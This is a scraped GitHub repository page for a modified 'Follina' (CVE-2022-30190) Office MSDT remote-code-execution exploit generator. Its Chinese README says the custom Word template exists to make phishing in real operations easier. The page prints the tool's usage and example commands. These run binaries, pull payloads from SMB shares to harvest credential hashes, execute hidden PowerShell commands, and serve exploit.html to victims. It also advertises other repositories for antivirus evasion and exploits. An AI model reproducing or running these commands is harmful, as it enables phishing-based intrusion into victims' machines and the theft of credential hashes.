komomon/CVE-2022-30190-follina-Office-MSDT-Fixed komomon/CVE-2022-30190-follina-Office-MSDT-Fixed

  • Stars
    star
    387
  • Rank 110,311 (Top 3 %)
  • Language
    Python
  • Created over 2 years ago
  • Updated over 1 year ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
komomon/CVE-2022-30190-follina-Office-MSDT-Fixed
github

komomon

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

CVE-2022-30190-follina.py-修改版,可以自定义word模板,方便实战中钓鱼使用。

'Follina' MS-MSDT n-day Microsoft Office RCE—修改版

根据 https://github.com/chvancooten/follina.py 的项目进行修改,可以自定义指定docx模板文件,便于实战中钓鱼使用,自己编辑好钓鱼word文档后-f参数指定即可。

Usage:

usage: follina.py [-h] -m {binary,command} [-b BINARY] [-f FILE] [-c COMMAND] [-u URL] [-H HOST] [-P PORT]

optional arguments:
  -h, --help            show this help message and exit

Required Arguments:
  -m {binary,command}, --mode {binary,command}
                        Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command

Binary Execution Arguments:
  -b BINARY, --binary BINARY
                        The full path of the binary to run. Can be local or remote from an SMB share

Docx file Arguments:
  -f FILE, --file FILE  The docx file

Command Execution Arguments:
  -c COMMAND, --command COMMAND
                        The encoded command to execute in "command" mode

Optional Arguments:
  -u URL, --url URL     The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost"
  -H HOST, --host HOST  The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)
  -P PORT, --port PORT  The port to run the HTTP server on, defaults to 80

Examples:

默认docx muban.docx
# Execute a local binary
python .\follina.py -m binary -b \windows\system32\calc.exe
python .\follina.py -m binary -b \windows\system32\calc.exe -f muban2.docx

# On linux you may have to escape backslashes
python .\follina.py -m binary -b \\windows\\system32\\calc.exe

# Execute a binary from a file share (can be used to farm hashes 👀)
python .\follina.py -m binary -b \\localhost\c$\windows\system32\calc.exe

# Execute an arbitrary powershell command
python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned > c:\users\public\owned.txt'"

# Run the web server on the default interface (all interfaces, 0.0.0.0), but tell the malicious document to retrieve it at http://1.2.3.4/exploit.html
python .\follina.py -m binary -b \windows\system32\calc.exe -u 1.2.3.4

# Only run the webserver on localhost, on port 8080 instead of 80
python .\follina.py -m binary -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080

image-20220602201236509

image-20220602201350939

一起交流

感兴趣的可以关注 Z2O安全攻防 公众号回复“加群”,添加Z2OBot 小K自动拉你加入Z2O安全攻防交流群分享更多好东西。

image-20220427110933992

公众号

Z2Oqq二维码4-16814031792311

团队建立了知识星球,不定时更新最新漏洞复现,手把手教你,同时不定时更新POC、内外网渗透测试骚操作。感兴趣的可以加一下。

image-20220427111016139

图片

图片

image-20230414002829568

欢迎star⭐ O(∩_∩)O

More Repositories

1

Komo

🚀Komo, a comprehensive asset collection and vulnerability scanning tool. Komo 一个综合资产收集和漏洞扫描工具,集成了20余款工具,通过多种方式对子域进行获取,收集域名邮箱,进行存活探测,域名指纹识别,域名反查ip,ip端口扫描,web服务链接爬取并发送给xray,对web服务进行POC漏洞扫描,对主机进行主机漏洞扫描。
Python
462
star
2

POC_Collect

(持续更新)本项目为存储团队Bot小K每日监测到的最新POC,EXP,以及自己平时总结的POC,为了方便渗透测试过程中,漏洞查询,脱网环境的渗透测试。
225
star
3

Powershell_bypassAV

Powershell 免杀脚本
PowerShell
48
star
4

Dcerpc_Find_OSInfo

🗽 基于Socket RAW,利用 NTLMSSP 探测 Windows远程主机信息
Python
25
star
5

CrawlArticleToMarkdown

文章爬取Bot😎 爬取微信公众号,知乎,知乎专栏,简书,知否(SegmentFault),掘金,CSDN,V2EX,博客园文章转为 markdown
21
star
6

CVE-2020-16898--EXP-POC

CVE-2020-16898 Windows TCP/IP远程代码执行漏洞 EXP&POC
Python
13
star
7

Mytools

🐱‍🏍红队小工具 | 自己编写的渗透中使用的各种脚本
Python
12
star
8

Invoke-Obfuscation-Bypass

powershell免杀,Invoke-Obfuscation-Bypass分析和修改
PowerShell
10
star
9

CVE-2022-44877-RCE

CVE-2022-44877 Centos Web Panel 7 Unauthenticated Remote Code Execution
9
star
10

BypassAV_Script

绕过杀软学习的项目
8
star
11

url_alive_scan

A multi coroutine concurrent batch URL survival detection tool written in Go, with concurrency determined by CPU by default.一个go编写的多协程并发批量url存活检测工具,并发数默认根据cpu决定。
Go
7
star
12

fofa_filter_plus

fofa_filter_plus-白嫖fofa所有资产
JavaScript
7
star
13

github_monitor

github 指定项目更新监控推送
Python
7
star
14

AutoHotkeyScript

AutoHotkey V2 脚本,自动给Typora代码块添加默认语言,让代码块亮起来
AutoHotkey
7
star
15

emailall

emailall修改版,修改部分bug
Python
6
star
16

CVE-2020-16898-EXP-POC

CVE-2020-16898 Windows TCP/IP远程代码执行漏洞 EXP&POC
Python
5
star
17

Ip2domain

🚀通过ssl证书,批量ip反查域名工具
Python
5
star
18

komoproxy

Socks5 proxy pool polling tool, supports ipv6 proxy, supports fofa collection proxy, supports importing custom Socks5 proxy files.socks5代理池轮切工具,支持ipv6代理,支持fofa采集代理,支持导入自定义的socks5代理文件
Go
4
star
19

hakrawler_plus

hakrawler-修改版,增加-u从参数获取url
Go
3
star
20

nginxWebUI_runCmd_RCE

nginxWebUI runCmd RCE POC
Python
2
star
21

first

Python
1
star